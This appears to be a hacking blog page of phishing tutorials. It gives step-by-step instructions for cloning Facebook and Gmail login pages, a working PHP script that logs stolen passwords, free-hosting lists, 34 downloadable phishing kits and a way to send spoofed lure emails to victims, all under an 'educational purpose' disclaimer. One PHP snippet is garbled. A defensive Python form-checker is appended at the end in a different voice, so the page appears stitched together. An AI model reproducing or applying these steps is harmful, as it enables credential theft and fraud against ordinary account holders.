Showing posts with label Phishing. Show all posts

Monday, July 29, 2013

Phishing Attack - What? How to Make ? How It Works?

Phishing ?
========
Phishing is the process of stealing sensitive information, such as usernames, passwords, and bank information,
by pretending to be someone you’re not. An example of this would be if you receive an e-mail from a hacker
pretending to be your bank. This e-mail might tell you that you need to update your account before it expires,
and then the hacker provides a link. Once you click on the link, you arrive at a website that looks exactly like
your actual bank page. In reality it’s just a perfect replica, and when you input your login details, it sends them to
the hacker's e-mail or stores them on his web server. Hackers that create the best, most deceiving phishing web
pages are knowledgeable in the areas of HTML and PHP programming. Below I will show a simple example
of some of the steps a hacker might take to create a phishing website. Seeing the steps a hacker would take
will help you defend against such an attack.


How To Make A Phishing Page Of Any Website ?
=====================================

Nowadays the major companies like Facebook, Google, Yahoo, Pinterest, etc. are all in competition, but every day 1000s of accounts are hacked.

Steps to create a phish page:

1. Go to the site for which you want to make a phish page...

2. I will choose "FACEBOOK".

3. After the site is open, right-click and choose the "view page source" option.

4. Copy all the code to Notepad.

Now the actual hacking begins.

5. After completing the copy, you need to find login_form like this...

    There you need to change the link to your .php file.

    This is the action of the login form, which sends the data to the server; we can change it to a simple "mail.php", so all the data goes to our server where we hosted our phish files.

6. PHP script for any phishing page.

###########
##   Code:  ##
###########

<?php
header ('Location: https://www.facebook.com/pages/create/ ');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;

?>

Copy this code and save in  "mail.php"  format.


7. Create a simple blank txt file and name it "log.txt".



And Done. Your phishing site is ready.




How to Use This Phishing Pages For Hacking Purpose ?
===========================================

1. To do a phishing attack, you first need a free hosting site. I provide many, as follows:

Hosting website that I recommend: http://000webhost.com/
      
Other Hosting Websites That You May Like:

* 110mb -                              http://110mb.com
* Ripway -                             http://ripway.com
* SuperFreeHost -               http://superfreehost.info
* Freehostia -                       http://freehostia.com
* Funpic -                              http://funpic.de 
* Funpic -                              http://funpic.org 
* Freeweb7 -                        http://freeweb7.com
* t35 -                                    http://t35.com
* Awardspace -                    http://awardspace.com
* PHPNet -                            http://phpnet.us
* Free Web Hosting Pro -   http://freewebhostingpro.com
* ProHosts -                          http://prohosts.org
* AtSpace -                           http://atspace.com
* 000webhost -                    http://000webhost.com/
* My5GB -                            http://www.my5gb.com/
* Oxyhost -                           http://www.oxyhost.com/
* Rack111 -                         http://www.rack111.com/
* Ocostwebhost -                http://0costwebhost.com/
* FreeZoka -                        http://www.freezoka.com/






2. After completing the registration, you have a username and password to log in.

3. Upload the phishing files to the server.

4. Now test whether it's working or not.

5. Open your domain, which you will see in your hosting site panel.

6. You will see the phish page which you uploaded; open it...

7. After the page has loaded, you can enter your ID & PASSWORD (I wrote these details into the phish page).

    When you click on the login button, it sends the logs to our server.

8. Check this log file & edit it, & you will see the logins with passwords.




Hope you guys enjoyed the phishing attack.

If you like it, please comment.

NOTE :  This is Only For Educational Purpose.



Monday, May 30, 2011

How to Hack using Phishing & 34 phishing scripts

Hello friends..
The next very interesting article is about "PHISHING". This is one of the easiest methods to hack anyone, without knowing the basics of hacking and programming...

What Phishing is ?
Suppose you check your email one day and find a message from your bank. You've gotten e-mail from them before, but this one seems suspicious, especially since it threatens to close your account if you don't reply immediately. What do you do? This message and others like it are examples of phishing, a method of online identity theft. In addition to stealing personal and financial data, phishers can infect computers with viruses and convince people to participate unwittingly in money laundering.

Most people associate phishing with e-mail messages that spoof, or mimic, banks, credit card companies or other businesses like Amazon or eBay. These messages look authentic and attempt to get victims to reveal their personal information. But e-mail messages are only one small piece of a phishing scam.

What to Plan Before Phishing ?

  1. Planning. Phishers decide which business to target and determine how to get e-mail addresses for the customers of that business. They often use the same mass-mailing and address collection techniques as spammers.
  2. Setup. Once they know which business to spoof and who their victims are, phishers create methods for delivering the message and collecting the data. Most often, this involves e-mail addresses and a Web page.
  3. Attack. This is the step people are most familiar with -- the phisher sends a phony message that appears to be from a reputable source.
  4. Collection. Phishers record the information victims enter into Web pages or popup windows.
  5. Identity Theft and Fraud. The phishers use the information they've gathered to make illegal purchases or otherwise commit fraud. As many as a fourth of the victims never fully recover.

If the phisher wants to coordinate another attack, he evaluates the successes and failures of the completed scam and begins the cycle again.

Phishing scams take advantage of software and security weaknesses on both the client and server sides. But even the most high-tech phishing scams work like old-fashioned con jobs, in which a hustler convinces his mark that he is reliable and trustworthy. Next, we'll look at the steps phishers take to convince victims that their messages are legitimate.

Phishing Scams

Since most people won't reveal their bank account, credit card number or password to just anyone, phishers have to take extra steps to trick their victims into giving up this information. This kind of deceptive attempt to get information is called social engineering. Phishers often use real company logos and copy legitimate e-mail messages, replacing the links with ones that direct the victim to a fraudulent page. They use spoofed, or fake, e-mail addresses in the "From:" and "Reply-to" fields of the message, and they obfuscate links to make them look legitimate. But recreating the appearance of an official message is just part of the process.

Phishing Prevention

Tip 1 : It is important that you learn to recognize all types of phishing emails. You should make yourself aware that if you receive a message which needs you to take immediate action with regard to any of your personal accounts then avoid it like the plague. Most phishing emails will be addressed to either “Dear Valued Customer” or “Dear Sir/Madam”, while any legitimate emails from your bank or credit card company will be addressed to you by name. It is important to know that the phisher who has sent the email in the first place is after your personal information in order to use it for fraudulent purposes.

Tip 2 : Never ever send any kind of sensitive personal information using an email. Emails are not the most secure form of communication available for people to use on the Internet. Certainly many scammers are quite capable of producing an email that looks legitimate and so will be easily able to forge such a document and then gain your information in this way.

Tip 3 : If you do have to transmit any personal information over the Internet then ensure that the site you are providing it to is completely secure. The best way for a person to identify if a site is secure or not is by looking at the site address. All sites which are considered to be secure should start with “https://” and not “http://”. Also if you look in the browser status bar you will see the lock icon being displayed.

Tip 4 : If you ever receive an email from someone you do not know and it contains a link, do not click on it. Instead, open a new browser page and type in the address which you know to be the authentic one. Or else you could call the person or company directly if you have had dealings with them and have spoken with them by telephone before.

How to do phishing ?

ICA members, now I am going to explain how to do PHISHING... The steps are as follows:
Step 1 - Firstly you must sign up for a free web hosting service like:
www.freehostia.com
www.byethost.com etc. and register a domain or subdomain.
After signing up, you have your own subdomain; for instance, if you registered with freehostia, then your domain is like “www.yourname.freehostia.com”

Step 2- Now Login to your freehostia account and go to “File Manager” in the freehostia control panel.

Step 3- Now what you have to do is, go to your domain folder like “yourname.freehostia.com” and create a separate folder in that directory with the name of the site, for eg. yahoo , if you want to phish a yahoomail account!

Step 4- Download the scripts from the links below (the compressed file), extract them to your desktop, and then open your desired phishing file. You’ll find 3 files there, viz. “Index.html”, “login.php” and "passwords.txt" [names may vary but are similar in some samples]. Here the Index.html file is a page that looks similar to sites like Facebook and Gmail, the Login.php file is used to process the data, and password.txt is used to save all hacked passwords.

AOL.com - AIM
d2jsp
DailyMotion.com
eBay.com
EverQuest Forum
FaceBook.com
FileFront.com
Gmail.com
Gmail.de
Habbo.de
Habbohotel.com
ICQ.com
Itunes
Megaupload.com
MMOCheats
Myspace
Nexon.net
OGame.de
Oxedion
Packstation
PayPal.com
PhotoBucket.com
Plesk
RapidShare.com
RapidShare.de
Rip/wa/y.com
siteworld.de
Skype.com
Steam phishing Site
Strato
Usenext
VanGuard
Yahoo.com
YouTube.com



Step 5- Now upload all 3 files to www folder inside “yourname.freehostia.com” .
So when you’re done with the uploading part, the link to your yahoo phisher is “www.yourname.freehostia.com/index.htm”.

Step 6- Congrats !! That is your phisher page !! Now all you have to do is copy the link to the phisher file, i.e. “www.yourname.freehostia.com/index.htm”, and send it to the victim you want to hack ! When he/she opens that link, he/she will be directed to your yahoo phisher, and when he/she logs in on that page he/she’ll be redirected to the original website and you’ll get the password in the “password.txt” file, which will be created in the same folder you created in your freehostia domain; the path to that file will be “www.yourname.freehostia.com/password.txt” !


How to make Victim to Login on your Phishing Page ?


There is a simple but effective method to fool the victim, so that he/she will log in on your phishing page without using their mind.... :-)
I am going to show an example using HI5.COM

1.) Go to your inbox and find a simple hi5 Friend Request.Copy it like in the picture:



2) Go to http://www.sendanonymousemail.net/ or http://www.anonymailer.net/ and send the email to Victim Like shown below...



3.)Now select the "Accept Friend" line.
*Click the hyperlink button.
*Paste your phishing link there.
*Click OK button.
See the pic for more:


4.) Now fill in the fields like this :

To: victimemail@dumb.com
From: info@hi5.com
Subject: Someone has sent you a hi5 Friend Request
Then enter the security code and click send. The e-mail will look like it came from hi5, except that it will redirect the victim to your phishing link instead of hi5.com
The same can be done for facebook and many more websites of your choice.
NOTE: There is a chance that the email won't be sent sometimes. So it would be best to send it to your own inbox just before you send it to your victim.


IMPORTANT NOTE: CHANGE YOUR FREEHOSTIA DIRECTORY PERMISSION TO “755” SO THAT NO ONE CAN ACCESS YOUR PERSONAL FILES EXCEPT THE PHISHER LOGIN PAGE!!


Wednesday, May 25, 2011

Phishing ?

Phishing is the process of stealing sensitive information, such as usernames, passwords, and bank information, by pretending to be someone you’re not. An example of this would be if you receive an e-mail from a hacker pretending to be your bank. This e-mail might tell you that you need to update your account before it expires, and then the hacker provides a link. Once you click on the link, you arrive at a website that looks exactly like your actual bank page. In reality it’s just a perfect replica, and when you input your login details, it sends them to the hacker's e-mail or stores them on his web server. Hackers that create the best, most deceiving phishing web pages are knowledgeable in the areas of HTML and PHP programming. Below I will show a simple example of some of the steps a hacker might take to create a phishing website. Seeing the steps a hacker would take will help you defend against such an attack.

1. First the hacker chooses a target. The most popular targets for phishing attacks are e-mail services such as Hotmail and Gmail because they are the most common and once a hacker gets access to your e-mail, he also gets access to a load of other user information for all the other websites you use. In this example we will pretend the hacker chose Gmail as his target.

2. After choosing his target, the hacker will go to the website and save the whole main page. I use Mozilla Firefox (highly recommend using this browser for its security and customization). So I would go to www.gmail.com and click File -> Save page as… , or simply hit + S
which does this automatically. Choose where you would like to save the web page and hit Save.


3. Once you have it saved, rename ServiceLogin.htm to index.htm. The reason you want to name it “index” is so when you upload it to a web host and someone goes to your link, the index page is the first page that shows up.
4. Next the hacker would create a PHP script to do his dirty deed of stealing your information. Below is a simple PHP script that logs and stores your login details when you click “Sign in”. To see how it works, copy and paste the following code into notepad. Next save it into the same directory as you saved the Gmail page, and name it phish.php. In addition to the phish.php page, create a new empty text file and name it list.txt.

$value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
} // This section simply assigns all the information going through this form to a variable. This includes your username and password.
Fwrite($handle, “\r\n”); // This writes your details to the file “list.txt”
fclose($handle); // This simply closes the connection to the file “list.txt”
exit;
?> // Marks the end of the PHP program.


5. Now the hacker would have to edit the main Gmail page to include his PHP script. To see what the hacker would do, open up the main Gmail page named index.htm with notepad.

6. Hit + F , or go to Edit -> Find , type in action and hit “Find Next”.

7. This will highlight the first occurrence of the word “action” in the script and you should see the following:
There are two “action” occurrences in the script so make sure you have the right one by looking at the “form id” name above. Change the link between action = “ “ to phish.php . This will make the form submit to your PHP phish script instead of to Google. After the link you will see the code:
Change the word “POST” to “GET” so that it looks like method=”GET”. What the GET method does is submit the information you type in through the URL so that the PHP script can log it.

8. Save and close the file.

9. Next the hacker would upload the files up to a free webhost that supports PHP. With a simple Google search you can come up with a bunch that fall under this category.

10. Once all the files are uploaded, you must give writing permissions to the “list.txt” file. Every hosting company should have a CHMOD option next to each file. Select this option and change the file permission for “list.txt” to 777. If you can’t figure out how to do this, ask people that use the same host or simply Google something similar to: “yourwebhostname chmod”.

11. Once everything is up and ready to go, go to the link your host provided you for your website and you should see the Gmail page replica. Type in a username/password and click Sign in. This should have redirected you to the real Gmail page.

12. Now go take a look at your list.txt file by going through your hosting file manager or going to http://www.yourwebhosturl.com/youraccount/list.txt. Although this is the most common, the web host you use may provide a different looking URL. Now if I put a username of “myusername” and a password of “mypassword” then “list.txt” would now look like the following:

As you can see if you fell for this the hacker would have your email and password. Scary, eh?
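Both walkthroughs on this page rely on the same tell: the copied login form's action no longer points at the real service, and in step 7 above the method is switched to GET so the password travels in the URL. The following check for those signs is an added example, not part of the original posts; the page fragments are constructed, and the host names and the brand_hosts allowlist are assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed page fragments (not captured from any site); hosts are placeholders.
GENUINE = '<form id="login" action="/signin" method="post"><input type="password" name="p"></form>'
COPY = '<form id="login" action="phish.php" method="GET"><input type="password" name="p"></form>'

class FormAudit(HTMLParser):
    """Record each <form>: its action, method and whether it holds a password field."""
    def __init__(self):
        super().__init__()
        self.forms, self._cur = [], None
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._cur = {"action": a.get("action") or "",
                         "method": (a.get("method") or "get").lower(), "password": False}
            self.forms.append(self._cur)
        elif tag == "input" and self._cur is not None and (a.get("type") or "").lower() == "password":
            self._cur["password"] = True
    def handle_endtag(self, tag):
        if tag == "form":
            self._cur = None

def audit_login_page(page_url, html, brand_hosts):
    """Flag password forms that submit off-brand, without TLS, or via GET."""
    parser = FormAudit()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        if not form["password"]:
            continue
        # A relative action resolves against the URL the page was served from.
        target = urlsplit(urljoin(page_url, form["action"]))
        if target.hostname not in brand_hosts:
            findings.append(("credentials-submitted-off-brand", target.geturl()))
        if target.scheme != "https":
            findings.append(("credentials-sent-without-tls", target.geturl()))
        if form["method"] == "get":
            findings.append(("password-in-query-string", target.geturl()))
    return findings
```

A GET submission also leaves the credentials in browser history, proxy logs and Referer headers, so the third finding is worth alerting on even for pages served from the genuine host.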

Tuesday, May 24, 2011